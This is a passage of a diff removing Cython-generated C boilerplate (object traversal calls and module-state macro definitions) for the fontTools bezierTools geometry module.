Py_VISIT(traverse_module_state->__pyx_tuple__55); - Py_VISIT(traverse_module_state->__pyx_tuple__57); - Py_VISIT(traverse_module_state->__pyx_tuple__59); - Py_VISIT(traverse_module_state->__pyx_tuple__61); - Py_VISIT(traverse_module_state->__pyx_tuple__63); - Py_VISIT(traverse_module_state->__pyx_tuple__65); - Py_VISIT(traverse_module_state->__pyx_tuple__67); - Py_VISIT(traverse_module_state->__pyx_tuple__69); - Py_VISIT(traverse_module_state->__pyx_tuple__71); - Py_VISIT(traverse_module_state->__pyx_tuple__73); - Py_VISIT(traverse_module_state->__pyx_tuple__75); - Py_VISIT(traverse_module_state->__pyx_tuple__77); - Py_VISIT(traverse_module_state->__pyx_tuple__79); - Py_VISIT(traverse_module_state->__pyx_tuple__81); - Py_VISIT(traverse_module_state->__pyx_tuple__83); - Py_VISIT(traverse_module_state->__pyx_tuple__85); - Py_VISIT(traverse_module_state->__pyx_tuple__87); - Py_VISIT(traverse_module_state->__pyx_tuple__89); - Py_VISIT(traverse_module_state->__pyx_tuple__92); - Py_VISIT(traverse_module_state->__pyx_tuple__94); - Py_VISIT(traverse_module_state->__pyx_tuple__95); - Py_VISIT(traverse_module_state->__pyx_tuple__97); - Py_VISIT(traverse_module_state->__pyx_tuple__99); - Py_VISIT(traverse_module_state->__pyx_codeobj__3); - Py_VISIT(traverse_module_state->__pyx_codeobj__7); - Py_VISIT(traverse_module_state->__pyx_tuple__101); - Py_VISIT(traverse_module_state->__pyx_codeobj__13); - Py_VISIT(traverse_module_state->__pyx_codeobj__16); - Py_VISIT(traverse_module_state->__pyx_codeobj__18); - Py_VISIT(traverse_module_state->__pyx_codeobj__20); - Py_VISIT(traverse_module_state->__pyx_codeobj__22); - Py_VISIT(traverse_module_state->__pyx_codeobj__24); - Py_VISIT(traverse_module_state->__pyx_codeobj__25); - Py_VISIT(traverse_module_state->__pyx_codeobj__27); - Py_VISIT(traverse_module_state->__pyx_codeobj__29); - Py_VISIT(traverse_module_state->__pyx_codeobj__31); - Py_VISIT(traverse_module_state->__pyx_codeobj__33); - 
Py_VISIT(traverse_module_state->__pyx_codeobj__35); - Py_VISIT(traverse_module_state->__pyx_codeobj__37); - Py_VISIT(traverse_module_state->__pyx_codeobj__39); - Py_VISIT(traverse_module_state->__pyx_codeobj__41); - Py_VISIT(traverse_module_state->__pyx_codeobj__43); - Py_VISIT(traverse_module_state->__pyx_codeobj__45); - Py_VISIT(traverse_module_state->__pyx_codeobj__47); - Py_VISIT(traverse_module_state->__pyx_codeobj__49); - Py_VISIT(traverse_module_state->__pyx_codeobj__51); - Py_VISIT(traverse_module_state->__pyx_codeobj__54); - Py_VISIT(traverse_module_state->__pyx_codeobj__56); - Py_VISIT(traverse_module_state->__pyx_codeobj__58); - Py_VISIT(traverse_module_state->__pyx_codeobj__60); - Py_VISIT(traverse_module_state->__pyx_codeobj__62); - Py_VISIT(traverse_module_state->__pyx_codeobj__64); - Py_VISIT(traverse_module_state->__pyx_codeobj__66); - Py_VISIT(traverse_module_state->__pyx_codeobj__68); - Py_VISIT(traverse_module_state->__pyx_codeobj__70); - Py_VISIT(traverse_module_state->__pyx_codeobj__72); - Py_VISIT(traverse_module_state->__pyx_codeobj__74); - Py_VISIT(traverse_module_state->__pyx_codeobj__76); - Py_VISIT(traverse_module_state->__pyx_codeobj__78); - Py_VISIT(traverse_module_state->__pyx_codeobj__80); - Py_VISIT(traverse_module_state->__pyx_codeobj__82); - Py_VISIT(traverse_module_state->__pyx_codeobj__84); - Py_VISIT(traverse_module_state->__pyx_codeobj__86); - Py_VISIT(traverse_module_state->__pyx_codeobj__88); - Py_VISIT(traverse_module_state->__pyx_codeobj__90); - Py_VISIT(traverse_module_state->__pyx_codeobj__93); - Py_VISIT(traverse_module_state->__pyx_codeobj__96); - Py_VISIT(traverse_module_state->__pyx_codeobj__98); - Py_VISIT(traverse_module_state->__pyx_codeobj__100); - Py_VISIT(traverse_module_state->__pyx_codeobj__102); - return 0; -} -#endif -/* #### Code section: module_state_defines ### */ -#define __pyx_d __pyx_mstate_global->__pyx_d -#define __pyx_b __pyx_mstate_global->__pyx_b -#define __pyx_cython_runtime 
__pyx_mstate_global->__pyx_cython_runtime -#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple -#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes -#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode -#ifdef __Pyx_CyFunction_USED -#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType -#endif -#ifdef __Pyx_FusedFunction_USED -#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType -#endif -#ifdef __Pyx_Generator_USED -#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType -#endif -#ifdef __Pyx_IterableCoroutine_USED -#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType -#endif -#ifdef __Pyx_Coroutine_USED -#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType -#endif -#ifdef __Pyx_Coroutine_USED -#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType -#endif -#if CYTHON_USE_MODULE_STATE -#endif -#if CYTHON_USE_MODULE_STATE -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t 
__pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr -#endif -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr -#define __pyx_n_s_1_t __pyx_mstate_global->__pyx_n_s_1_t -#define __pyx_n_s_1_t_2 __pyx_mstate_global->__pyx_n_s_1_t_2 -#define __pyx_n_s_2_t_1_t __pyx_mstate_global->__pyx_n_s_2_t_1_t -#define __pyx_kp_u_Approximates_the_arc_length_for __pyx_mstate_global->__pyx_kp_u_Approximates_the_arc_length_for -#define __pyx_n_s_AttributeError __pyx_mstate_global->__pyx_n_s_AttributeError -#define __pyx_n_s_COMPILED 
__pyx_mstate_global->__pyx_n_s_COMPILED -#define __pyx_kp_u_Calculates_the_arc_length_for_a __pyx_mstate_global->__pyx_kp_u_Calculates_the_arc_length_for_a -#define __pyx_kp_u_Calculates_the_bounding_rectangl __pyx_mstate_global->__pyx_kp_u_Calculates_the_bounding_rectangl -#define __pyx_kp_u_Calculates_the_bounding_rectangl_2 __pyx_mstate_global->__pyx_kp_u_Calculates_the_bounding_rectangl_2 -#define __pyx_kp_u_Couldn_t_work_out_which_intersec __pyx_mstate_global->__pyx_kp_u_Couldn_t_work_out_which_intersec -#define __pyx_n_s_DD __pyx_mstate_global->__pyx_n_s_DD -#define __pyx_kp_u_Finds_intersections_between_a_cu __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_a_cu -#define __pyx_kp_u_Finds_intersections_between_a_cu_2 __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_a_cu_2 -#define __pyx_kp_u_Finds_intersections_between_two __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_two -#define __pyx_kp_u_Finds_intersections_between_two_2 __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_two_2 -#define __pyx_n_s_Identity __pyx_mstate_global->__pyx_n_s_Identity -#define __pyx_n_s_ImportError __pyx_mstate_global->__pyx_n_s_ImportError -#define __pyx_n_s_Intersection __pyx_mstate_global->__pyx_n_s_Intersection -#define __pyx_n_u_Intersection __pyx_mstate_global->__pyx_n_u_Intersection -#define __pyx_n_s_Len __pyx_mstate_global->__pyx_n_s_Len -#define __pyx_kp_s_Lib_fontTools_misc_bezierTools_p __pyx_mstate_global->__pyx_kp_s_Lib_fontTools_misc_bezierTools_p -#define __pyx_n_s_Q __pyx_mstate_global->__pyx_n_s_Q -#define __pyx_n_s_Q3 __pyx_mstate_global->__pyx_n_s_Q3 -#define __pyx_n_s_R __pyx_mstate_global->__pyx_n_s_R -#define __pyx_n_s_R2 __pyx_mstate_global->__pyx_n_s_R2 -#define __pyx_n_s_R2_Q3 __pyx_mstate_global->__pyx_n_s_R2_Q3 -#define __pyx_kp_u_Solve_a_cubic_equation_Solves_a __pyx_mstate_global->__pyx_kp_u_Solve_a_cubic_equation_Solves_a -#define __pyx_kp_u_Split_a_cubic_Bezier_curve_at_a 
__pyx_mstate_global->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a -#define __pyx_kp_u_Split_a_cubic_Bezier_curve_at_on __pyx_mstate_global->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on -#define __pyx_kp_u_Split_a_line_at_a_given_coordina __pyx_mstate_global->__pyx_kp_u_Split_a_line_at_a_given_coordina -#define __pyx_kp_u_Split_a_quadratic_Bezier_curve_a __pyx_mstate_global->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a -#define __pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2 __pyx_mstate_global->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2 -#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError -#define __pyx_kp_u_Unknown_curve_degree __pyx_mstate_global->__pyx_kp_u_Unknown_curve_degree -#define __pyx_n_s_ValueError __pyx_mstate_global->__pyx_n_s_ValueError -#define __pyx_kp_u__10 __pyx_mstate_global->__pyx_kp_u__10 -#define __pyx_n_s__103 __pyx_mstate_global->__pyx_n_s__103 -#define __pyx_n_s__11 __pyx_mstate_global->__pyx_n_s__11 -#define __pyx_kp_u__9 __pyx_mstate_global->__pyx_kp_u__9 -#define __pyx_n_s__91 __pyx_mstate_global->__pyx_n_s__91 -#define __pyx_n_s_a __pyx_mstate_global->__pyx_n_s_a -#define __pyx_n_s_a1 __pyx_mstate_global->__pyx_n_s_a1 -#define __pyx_n_s_a1_3 __pyx_mstate_global->__pyx_n_s_a1_3 -#define __pyx_n_s_a1x __pyx_mstate_global->__pyx_n_s_a1x -#define __pyx_n_s_a1y __pyx_mstate_global->__pyx_n_s_a1y -#define __pyx_n_s_a2 __pyx_mstate_global->__pyx_n_s_a2 -#define __pyx_n_s_a3 __pyx_mstate_global->__pyx_n_s_a3 -#define __pyx_n_s_acos __pyx_mstate_global->__pyx_n_s_acos -#define __pyx_n_s_aligned_curve __pyx_mstate_global->__pyx_n_s_aligned_curve -#define __pyx_n_s_alignment_transformation __pyx_mstate_global->__pyx_n_s_alignment_transformation -#define __pyx_n_s_all __pyx_mstate_global->__pyx_n_s_all -#define __pyx_n_s_angle __pyx_mstate_global->__pyx_n_s_angle -#define __pyx_n_s_append __pyx_mstate_global->__pyx_n_s_append -#define __pyx_n_s_approximateCubicArcLength __pyx_mstate_global->__pyx_n_s_approximateCubicArcLength 
-#define __pyx_n_u_approximateCubicArcLength __pyx_mstate_global->__pyx_n_u_approximateCubicArcLength -#define __pyx_n_s_approximateCubicArcLengthC __pyx_mstate_global->__pyx_n_s_approximateCubicArcLengthC -#define __pyx_n_u_approximateCubicArcLengthC __pyx_mstate_global->__pyx_n_u_approximateCubicArcLengthC -#define __pyx_kp_u_approximateCubicArcLength_line_3 __pyx_mstate_global->__pyx_kp_u_approximateCubicArcLength_line_3 -#define __pyx_n_s_approximateQuadraticArcLength __pyx_mstate_global->__pyx_n_s_approximateQuadraticArcLength -#define __pyx_n_u_approximateQuadraticArcLength __pyx_mstate_global->__pyx_n_u_approximateQuadraticArcLength -#define __pyx_n_s_approximateQuadraticArcLengthC __pyx_mstate_global->__pyx_n_s_approximateQuadraticArcLengthC -#define __pyx_n_u_approximateQuadraticArcLengthC __pyx_mstate_global->__pyx_n_u_approximateQuadraticArcLengthC -#define __pyx_n_s_arch __pyx_mstate_global->__pyx_n_s_arch -#define __pyx_n_s_args __pyx_mstate_global->__pyx_n_s_args -#define __pyx_n_s_asinh __pyx_mstate_global->__pyx_n_s_asinh -#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines -#define __pyx_n_s_atan2 __pyx_mstate_global->__pyx_n_s_atan2 -#define __pyx_n_s_ax __pyx_mstate_global->__pyx_n_s_ax -#define __pyx_n_s_ax2 __pyx_mstate_global->__pyx_n_s_ax2 -#define __pyx_n_s_ax3 __pyx_mstate_global->__pyx_n_s_ax3 -#define __pyx_n_s_ay __pyx_mstate_global->__pyx_n_s_ay -#define __pyx_n_s_ay2 __pyx_mstate_global->__pyx_n_s_ay2 -#define __pyx_n_s_ay3 __pyx_mstate_global->__pyx_n_s_ay3 -#define __pyx_n_s_b __pyx_mstate_global->__pyx_n_s_b -#define __pyx_n_s_b1 __pyx_mstate_global->__pyx_n_s_b1 -#define __pyx_n_s_b1x __pyx_mstate_global->__pyx_n_s_b1x -#define __pyx_n_s_b1y __pyx_mstate_global->__pyx_n_s_b1y -#define __pyx_n_s_both_points_are_on_same_side_of __pyx_mstate_global->__pyx_n_s_both_points_are_on_same_side_of -#define __pyx_n_s_bounds1 __pyx_mstate_global->__pyx_n_s_bounds1 -#define __pyx_n_s_bounds2 
__pyx_mstate_global->__pyx_n_s_bounds2 -#define __pyx_n_s_box __pyx_mstate_global->__pyx_n_s_box -#define __pyx_n_s_bx __pyx_mstate_global->__pyx_n_s_bx -#define __pyx_n_s_bx2 __pyx_mstate_global->__pyx_n_s_bx2 -#define __pyx_n_s_by __pyx_mstate_global->__pyx_n_s_by -#define __pyx_n_s_by2 __pyx_mstate_global->__pyx_n_s_by2 -#define __pyx_n_s_c __pyx_mstate_global->__pyx_n_s_c -#define __pyx_n_s_c1 __pyx_mstate_global->__pyx_n_s_c1 -#define __pyx_n_s_c11 __pyx_mstate_global->__pyx_n_s_c11 -#define __pyx_n_s_c11_range __pyx_mstate_global->__pyx_n_s_c11_range -#define __pyx_n_s_c12 __pyx_mstate_global->__pyx_n_s_c12 -#define __pyx_n_s_c12_range __pyx_mstate_global->__pyx_n_s_c12_range -#define __pyx_n_s_c1x __pyx_mstate_global->__pyx_n_s_c1x -#define __pyx_n_s_c1y __pyx_mstate_global->__pyx_n_s_c1y -#define __pyx_n_s_c21 __pyx_mstate_global->__pyx_n_s_c21 -#define __pyx_n_s_c21_range __pyx_mstate_global->__pyx_n_s_c21_range -#define __pyx_n_s_c22 __pyx_mstate_global->__pyx_n_s_c22 -#define __pyx_n_s_c22_range __pyx_mstate_global->__pyx_n_s_c22_range -#define __pyx_n_s_calcBounds __pyx_mstate_global->__pyx_n_s_calcBounds -#define __pyx_n_s_calcCubicArcLength __pyx_mstate_global->__pyx_n_s_calcCubicArcLength -#define __pyx_n_u_calcCubicArcLength __pyx_mstate_global->__pyx_n_u_calcCubicArcLength -#define __pyx_n_s_calcCubicArcLengthC __pyx_mstate_global->__pyx_n_s_calcCubicArcLengthC -#define __pyx_n_u_calcCubicArcLengthC __pyx_mstate_global->__pyx_n_u_calcCubicArcLengthC -#define __pyx_n_s_calcCubicArcLengthCRecurse __pyx_mstate_global->__pyx_n_s_calcCubicArcLengthCRecurse -#define __pyx_n_s_calcCubicBounds __pyx_mstate_global->__pyx_n_s_calcCubicBounds -#define __pyx_n_u_calcCubicBounds __pyx_mstate_global->__pyx_n_u_calcCubicBounds -#define __pyx_kp_u_calcCubicBounds_line_412 __pyx_mstate_global->__pyx_kp_u_calcCubicBounds_line_412 -#define __pyx_n_s_calcCubicParameters __pyx_mstate_global->__pyx_n_s_calcCubicParameters -#define __pyx_n_s_calcCubicPoints 
__pyx_mstate_global->__pyx_n_s_calcCubicPoints -#define __pyx_n_s_calcQuadraticArcLength __pyx_mstate_global->__pyx_n_s_calcQuadraticArcLength -#define __pyx_n_u_calcQuadraticArcLength __pyx_mstate_global->__pyx_n_u_calcQuadraticArcLength -#define __pyx_n_s_calcQuadraticArcLengthC __pyx_mstate_global->__pyx_n_s_calcQuadraticArcLengthC -#define __pyx_n_u_calcQuadraticArcLengthC __pyx_mstate_global->__pyx_n_u_calcQuadraticArcLengthC -#define __pyx_kp_u_calcQuadraticArcLength_line_151 __pyx_mstate_global->__pyx_kp_u_calcQuadraticArcLength_line_151 -#define __pyx_n_s_calcQuadraticBounds __pyx_mstate_global->__pyx_n_s_calcQuadraticBounds -#define __pyx_n_u_calcQuadraticBounds __pyx_mstate_global->__pyx_n_u_calcQuadraticBounds -#define __pyx_kp_u_calcQuadraticBounds_line_298 __pyx_mstate_global->__pyx_kp_u_calcQuadraticBounds_line_298 -#define __pyx_n_s_calcQuadraticParameters __pyx_mstate_global->__pyx_n_s_calcQuadraticParameters -#define __pyx_n_s_calcQuadraticPoints __pyx_mstate_global->__pyx_n_s_calcQuadraticPoints -#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem -#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback -#define __pyx_n_s_close __pyx_mstate_global->__pyx_n_s_close -#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections -#define __pyx_n_s_cos __pyx_mstate_global->__pyx_n_s_cos -#define __pyx_n_s_cubicPointAtT __pyx_mstate_global->__pyx_n_s_cubicPointAtT -#define __pyx_n_u_cubicPointAtT __pyx_mstate_global->__pyx_n_u_cubicPointAtT -#define __pyx_n_s_cubicPointAtTC __pyx_mstate_global->__pyx_n_s_cubicPointAtTC -#define __pyx_n_u_cubicPointAtTC __pyx_mstate_global->__pyx_n_u_cubicPointAtTC -#define __pyx_n_s_curve __pyx_mstate_global->__pyx_n_s_curve -#define __pyx_n_s_curve1 __pyx_mstate_global->__pyx_n_s_curve1 -#define __pyx_n_s_curve2 __pyx_mstate_global->__pyx_n_s_curve2 -#define __pyx_n_s_curveCurveIntersections __pyx_mstate_global->__pyx_n_s_curveCurveIntersections 
-#define __pyx_n_u_curveCurveIntersections __pyx_mstate_global->__pyx_n_u_curveCurveIntersections -#define __pyx_kp_u_curveCurveIntersections_line_137 __pyx_mstate_global->__pyx_kp_u_curveCurveIntersections_line_137 -#define __pyx_n_s_curveLineIntersections __pyx_mstate_global->__pyx_n_s_curveLineIntersections -#define __pyx_n_u_curveLineIntersections __pyx_mstate_global->__pyx_n_u_curveLineIntersections -#define __pyx_kp_u_curveLineIntersections_line_1248 __pyx_mstate_global->__pyx_kp_u_curveLineIntersections_line_1248 -#define __pyx_n_s_curve_bounds __pyx_mstate_global->__pyx_n_s_curve_bounds -#define __pyx_n_s_curve_curve_intersections_t __pyx_mstate_global->__pyx_n_s_curve_curve_intersections_t -#define __pyx_n_s_curve_curve_intersections_t_loc __pyx_mstate_global->__pyx_n_s_curve_curve_intersections_t_loc -#define __pyx_n_s_curve_curve_intersections_t_loc_2 __pyx_mstate_global->__pyx_n_s_curve_curve_intersections_t_loc_2 -#define __pyx_n_s_curve_line_intersections_t __pyx_mstate_global->__pyx_n_s_curve_line_intersections_t -#define __pyx_n_s_curve_line_intersections_t_loca __pyx_mstate_global->__pyx_n_s_curve_line_intersections_t_loca -#define __pyx_n_s_cx __pyx_mstate_global->__pyx_n_s_cx -#define __pyx_n_s_cy __pyx_mstate_global->__pyx_n_s_cy -#define __pyx_n_s_cython __pyx_mstate_global->__pyx_n_s_cython -#define __pyx_n_s_d __pyx_mstate_global->__pyx_n_s_d -#define __pyx_n_s_d0 __pyx_mstate_global->__pyx_n_s_d0 -#define __pyx_n_s_d1 __pyx_mstate_global->__pyx_n_s_d1 -#define __pyx_n_s_d1x __pyx_mstate_global->__pyx_n_s_d1x -#define __pyx_n_s_d1y __pyx_mstate_global->__pyx_n_s_d1y -#define __pyx_n_s_delta __pyx_mstate_global->__pyx_n_s_delta -#define __pyx_n_s_delta_2 __pyx_mstate_global->__pyx_n_s_delta_2 -#define __pyx_n_s_delta_3 __pyx_mstate_global->__pyx_n_s_delta_3 -#define __pyx_n_s_deriv3 __pyx_mstate_global->__pyx_n_s_deriv3 -#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable -#define __pyx_n_s_doctest 
__pyx_mstate_global->__pyx_n_s_doctest -#define __pyx_n_s_dx __pyx_mstate_global->__pyx_n_s_dx -#define __pyx_n_s_dy __pyx_mstate_global->__pyx_n_s_dy -#define __pyx_n_s_e __pyx_mstate_global->__pyx_n_s_e -#define __pyx_n_s_e1 __pyx_mstate_global->__pyx_n_s_e1 -#define __pyx_n_s_e1x __pyx_mstate_global->__pyx_n_s_e1x -#define __pyx_n_s_e1y __pyx_mstate_global->__pyx_n_s_e1y -#define __pyx_n_s_e2 __pyx_mstate_global->__pyx_n_s_e2 -#define __pyx_n_s_e2x __pyx_mstate_global->__pyx_n_s_e2x -#define __pyx_n_s_e2y __pyx_mstate_global->__pyx_n_s_e2y -#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable -#define __pyx_n_s_end __pyx_mstate_global->__pyx_n_s_end -#define __pyx_n_s_epsilon __pyx_mstate_global->__pyx_n_s_epsilon -#define __pyx_n_s_epsilonDigits __pyx_mstate_global->__pyx_n_s_epsilonDigits -#define __pyx_n_s_ex __pyx_mstate_global->__pyx_n_s_ex -#define __pyx_n_s_exit __pyx_mstate_global->__pyx_n_s_exit -#define __pyx_n_s_ey __pyx_mstate_global->__pyx_n_s_ey -#define __pyx_n_s_failed __pyx_mstate_global->__pyx_n_s_failed -#define __pyx_n_s_fontTools_misc __pyx_mstate_global->__pyx_n_s_fontTools_misc -#define __pyx_n_s_fontTools_misc_arrayTools __pyx_mstate_global->__pyx_n_s_fontTools_misc_arrayTools -#define __pyx_n_s_fontTools_misc_bezierTools __pyx_mstate_global->__pyx_n_s_fontTools_misc_bezierTools -#define __pyx_n_s_fontTools_misc_transform __pyx_mstate_global->__pyx_n_s_fontTools_misc_transform -#define __pyx_n_s_found __pyx_mstate_global->__pyx_n_s_found -#define __pyx_kp_u_g __pyx_mstate_global->__pyx_kp_u_g -#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc -#define __pyx_n_s_genexpr __pyx_mstate_global->__pyx_n_s_genexpr -#define __pyx_n_s_i __pyx_mstate_global->__pyx_n_s_i -#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import -#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing -#define __pyx_n_s_insert __pyx_mstate_global->__pyx_n_s_insert -#define __pyx_n_s_intersection_ts 
__pyx_mstate_global->__pyx_n_s_intersection_ts -#define __pyx_n_s_intersections __pyx_mstate_global->__pyx_n_s_intersections -#define __pyx_n_s_intersects __pyx_mstate_global->__pyx_n_s_intersects -#define __pyx_n_s_isHorizontal __pyx_mstate_global->__pyx_n_s_isHorizontal -#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine -#define __pyx_n_s_isclose __pyx_mstate_global->__pyx_n_s_isclose -#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled -#define __pyx_n_s_it __pyx_mstate_global->__pyx_n_s_it -#define __pyx_n_s_key __pyx_mstate_global->__pyx_n_s_key -#define __pyx_n_s_line __pyx_mstate_global->__pyx_n_s_line -#define __pyx_n_s_lineLineIntersections __pyx_mstate_global->__pyx_n_s_lineLineIntersections -#define __pyx_n_u_lineLineIntersections __pyx_mstate_global->__pyx_n_u_lineLineIntersections -#define __pyx_kp_u_lineLineIntersections_line_1147 __pyx_mstate_global->__pyx_kp_u_lineLineIntersections_line_1147 -#define __pyx_n_s_linePointAtT __pyx_mstate_global->__pyx_n_s_linePointAtT -#define __pyx_n_u_linePointAtT __pyx_mstate_global->__pyx_n_u_linePointAtT -#define __pyx_n_s_line_t __pyx_mstate_global->__pyx_n_s_line_t -#define __pyx_n_s_line_t_of_pt __pyx_mstate_global->__pyx_n_s_line_t_of_pt -#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main -#define __pyx_n_u_main __pyx_mstate_global->__pyx_n_u_main -#define __pyx_n_s_math __pyx_mstate_global->__pyx_n_s_math -#define __pyx_n_s_mid __pyx_mstate_global->__pyx_n_s_mid -#define __pyx_n_s_midPt __pyx_mstate_global->__pyx_n_s_midPt -#define __pyx_n_s_midpoint __pyx_mstate_global->__pyx_n_s_midpoint -#define __pyx_n_s_mult __pyx_mstate_global->__pyx_n_s_mult -#define __pyx_n_s_n __pyx_mstate_global->__pyx_n_s_n -#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name -#define __pyx_n_s_namedtuple __pyx_mstate_global->__pyx_n_s_namedtuple -#define __pyx_n_s_obj __pyx_mstate_global->__pyx_n_s_obj -#define __pyx_n_s_off1 __pyx_mstate_global->__pyx_n_s_off1 -#define 
__pyx_n_s_off2 __pyx_mstate_global->__pyx_n_s_off2 -#define __pyx_n_s_one __pyx_mstate_global->__pyx_n_s_one -#define __pyx_n_s_origDist __pyx_mstate_global->__pyx_n_s_origDist -#define __pyx_n_s_origin __pyx_mstate_global->__pyx_n_s_origin -#define __pyx_n_s_p0 __pyx_mstate_global->__pyx_n_s_p0 -#define __pyx_n_s_p1 __pyx_mstate_global->__pyx_n_s_p1 -#define __pyx_n_s_p2 __pyx_mstate_global->__pyx_n_s_p2 -#define __pyx_n_s_p3 __pyx_mstate_global->__pyx_n_s_p3 -#define __pyx_n_s_pi __pyx_mstate_global->__pyx_n_s_pi -#define __pyx_n_s_pointAtT __pyx_mstate_global->__pyx_n_s_pointAtT -#define __pyx_n_s_pointFinder __pyx_mstate_global->__pyx_n_s_pointFinder -#define __pyx_n_s_points __pyx_mstate_global->__pyx_n_s_points -#define __pyx_n_s_precision __pyx_mstate_global->__pyx_n_s_precision -#define __pyx_n_s_print __pyx_mstate_global->__pyx_n_s_print -#define __pyx_n_s_printSegments __pyx_mstate_global->__pyx_n_s_printSegments -#define __pyx_n_s_pt __pyx_mstate_global->__pyx_n_s_pt -#define __pyx_n_u_pt __pyx_mstate_global->__pyx_n_u_pt -#define __pyx_n_s_pt1 __pyx_mstate_global->__pyx_n_s_pt1 -#define __pyx_n_s_pt1x __pyx_mstate_global->__pyx_n_s_pt1x -#define __pyx_n_s_pt1y __pyx_mstate_global->__pyx_n_s_pt1y -#define __pyx_n_s_pt2 __pyx_mstate_global->__pyx_n_s_pt2 -#define __pyx_n_s_pt2x __pyx_mstate_global->__pyx_n_s_pt2x -#define __pyx_n_s_pt2y __pyx_mstate_global->__pyx_n_s_pt2y -#define __pyx_n_s_pt3 __pyx_mstate_global->__pyx_n_s_pt3 -#define __pyx_n_s_pt4 __pyx_mstate_global->__pyx_n_s_pt4 -#define __pyx_n_s_px __pyx_mstate_global->__pyx_n_s_px -#define __pyx_n_s_py __pyx_mstate_global->__pyx_n_s_py -#define __pyx_n_s_quadraticPointAtT __pyx_mstate_global->__pyx_n_s_quadraticPointAtT -#define __pyx_n_u_quadraticPointAtT __pyx_mstate_global->__pyx_n_u_quadraticPointAtT -#define __pyx_n_s_r __pyx_mstate_global->__pyx_n_s_r -#define __pyx_n_s_rDD __pyx_mstate_global->__pyx_n_s_rDD -#define __pyx_n_s_rQ2 __pyx_mstate_global->__pyx_n_s_rQ2 -#define __pyx_n_s_range 
